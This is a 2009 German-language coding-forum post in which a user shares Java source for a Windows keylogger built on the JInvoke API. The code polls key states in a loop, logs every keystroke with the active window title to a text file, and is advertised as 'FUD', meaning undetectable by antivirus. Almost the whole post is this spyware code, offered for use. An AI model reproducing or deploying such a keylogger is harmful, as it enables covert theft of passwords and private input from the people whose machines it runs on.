PHP Forum - Coding Board
Juni 18, 2018, 02:30:38 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: [1]
  Drucken  
Autor Thema: Keylogger mit der API JInvoke  (Gelesen 86 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
Ph0xEn
Jr. Member
**
Beiträge: 62


Profil anzeigen E-Mail
« am: Februar 26, 2009, 07:40:27 »

Hier ist eine kleine Keyloggermethode für euch die alle Tastenanschläge loggt und auf dem Bildschirm ausgibt...natürlich können die eingaben auch gespeichert werden...
Das ganze ist FUD Zwinkernd

Code:
void Logging() throws InterruptedException, IOException{
int zeichen = 0;
log = new FileWriter("LogFile.txt",true);
BufferedWriter out = new BufferedWriter(log);
getFensterText();
while(true){
for(int i=0;i<=90;i++)
if(User32.GetAsyncKeyState(i) == -32767){
if(i < 31){
switch(i){
case 1:System.out.print(&quot; &quot; + getFensterText() + &quot; ->MouseLeftButton &quot;);out.write(&quot; &quot; + getFensterText() + &quot; ->MouseLeftButton &quot;);break;
case 8:System.out.print(&quot;<==&quot;);out.write(&quot;<==&quot;);break;
case 16:System.out.print(&quot;__SHIFT__&quot;);out.write(&quot;__SHIFT__&quot;);break;
}

}else{
System.out.print((char)i);
out.write((char)i);
}

}
if(zeichen == 20){
out.write(&quot;\n&quot;);
System.out.println(0x000D);
}
zeichen++;
Thread.sleep(10);
out.flush();
}
}
Gespeichert
Seiten: [1]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS